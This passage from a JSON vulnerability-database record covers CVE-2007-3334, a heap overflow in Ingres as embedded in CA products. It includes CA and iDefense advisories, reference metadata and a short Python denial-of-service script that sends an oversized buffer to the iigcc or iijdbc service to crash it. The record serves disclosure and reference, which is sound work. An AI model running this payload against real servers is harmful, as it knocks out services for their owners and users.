r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n   r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter 
Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, 
CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities\n\niDefense Security Advisory 06.21.07\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nJun 21, 2007\n\nI. BACKGROUND\n\nIngres is the database backend used by default in several CA products. \nThe SCM (Secure Content Manager) is one of the products that uses\nIngres. The SCM use Ingres to store quarantined virii and blocked HTTP\nrequests/replies. For more information visit the following URLs. \n\nhttp://www3.ca.com/solutions/Product.aspx?ID=1013\n\nhttp://www.ingres.com/\n\nII. The Communications\nServer is the main component responsible for receiving and handling\nrequests from the network. The Data Access Server is responsible for\nhandling requests from the Ingres JDBC Driver and .NET data providers. \nThese requests are decoded into Ingres internal formats and passed on\nto other components of the database server. 
\n\nThe application does not properly validate the length of attacker\nsupplied data before copying it into a fixed size heap buffer. This\nleads to an exploitable condition. \n\nIII. ANALYSIS\n\nExploitation allows an unauthenticated attacker to execute arbitrary\ncode with SYSTEM privileges. \n\nIn order to exploit this vulnerability an attacker would have to send a\nmalformed request to the database server. This requires the ability to\nestablish a TCP session on port 10916 (iigcc) or 10923 (iigcd). \n\nExploitation has been demonstrated to be trivial. \n\nIV. Previous versions may also be affected. In addition, any\napplication that uses the Ingres Database may be vulnerable. \n\nV. WORKAROUND\n\nEmploying firewalls or other access control methods can effectively\nreduce exposure to this vulnerability. \n\nVI. VENDOR RESPONSE\n\nCA has made fixes available for all supported CA products that embed\nIngres. For more information consult CA\u0027s Security Alert at the\nfollowing URL. \n\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-3334 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n01/16/2007  Initial vendor notification\n01/17/2007  Initial vendor response\n06/21/2007  Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. 
If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n    print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n    print \"Vulnerable Services: iigcc, iijdbc\"\n    sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n        payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n        payload = \"\\x41\" * 1066\nelse:\n        print \"Vulnerable Services: iigcc, iijdbc\"\n        sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3334"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "57276"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-3334",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "24585",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "25775",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25756",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-2288",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-2290",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1018278",
        "trust": 1.6
      },
      {
        "db": "OSVDB",
        "id": "37488",
        "trust": 1.0
      },
      {
        "db": "OSVDB",
        "id": "37487",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "35002",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "34992",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "34991",
        "trust": 0.6
      },
      {
        "db": "IDEFENSE",
        "id": "20070621 INGRES DATABASE MULTIPLE HEAP CORRUPTION VULNERABILITIES",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "57303",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "57276",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "92818",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "57276"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "id": "VAR-200706-0395",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.12878788
  },
  "last_update_date": "2024-11-23T22:09:53.438000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.actian.com/products/ingres"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://windows.microsoft.com/en-US/windows/home"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
      },
      {
        "trust": 2.0,
        "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
      },
      {
        "trust": 2.0,
        "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
      },
      {
        "trust": 1.6,
        "url": "http://www.securitytracker.com/id?1018278"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/bid/24585"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25775"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25756"
      },
      {
        "trust": 1.0,
        "url": "http://osvdb.org/37487"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
      },
      {
        "trust": 1.0,
        "url": "http://osvdb.org/37488"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/2290"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/2288"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3334"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/35002"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/34992"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/34991"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/2290"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/2288"
      },
      {
        "trust": 0.4,
        "url": "http://www.ingres.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472192"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/471950"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472197"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472193"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472194"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472200"
      },
      {
        "trust": 0.3,
        "url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
      },
      {
        "trust": 0.3,
        "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
      },
      {
        "trust": 0.1,
        "url": "http://supportconnect.ca.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/contact/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
      },
      {
        "trust": 0.1,
        "url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/privacy/"
      },
      {
        "trust": 0.1,
        "url": "http://supportconnect.ca.com."
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
      },
      {
        "trust": 0.1,
        "url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ngssoftware.com/research/advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/legal/"
      },
      {
        "trust": 0.1,
        "url": "http://www3.ca.com/solutions/product.aspx?id=1013"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/),"
      },
      {
        "trust": 0.1,
        "url": "http://labs.idefense.com/intelligence/vulnerabilities/"
      },
      {
        "trust": 0.1,
        "url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
      },
      {
        "trust": 0.1,
        "url": "http://labs.idefense.com/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "57276"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "57276"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-06-21T00:00:00",
        "db": "BID",
        "id": "24585"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "date": "2007-06-26T21:32:27",
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "date": "2007-06-26T20:06:58",
        "db": "PACKETSTORM",
        "id": "57276"
      },
      {
        "date": "2010-08-17T01:35:50",
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "date": "2007-06-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      },
      {
        "date": "2007-06-21T22:30:00",
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-03-19T08:36:00",
        "db": "BID",
        "id": "24585"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      },
      {
        "date": "2007-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      },
      {
        "date": "2024-11-21T00:32:58.790000",
        "db": "NVD",
        "id": "CVE-2007-3334"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "57276"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Heap-based buffer overflow vulnerability in the Communications Server component of Ingres Database Server, as used in CA products including eTrust Secure Content Manager",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-002222"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-357"
      }
    ],
    "trust": 0.6
  }
}

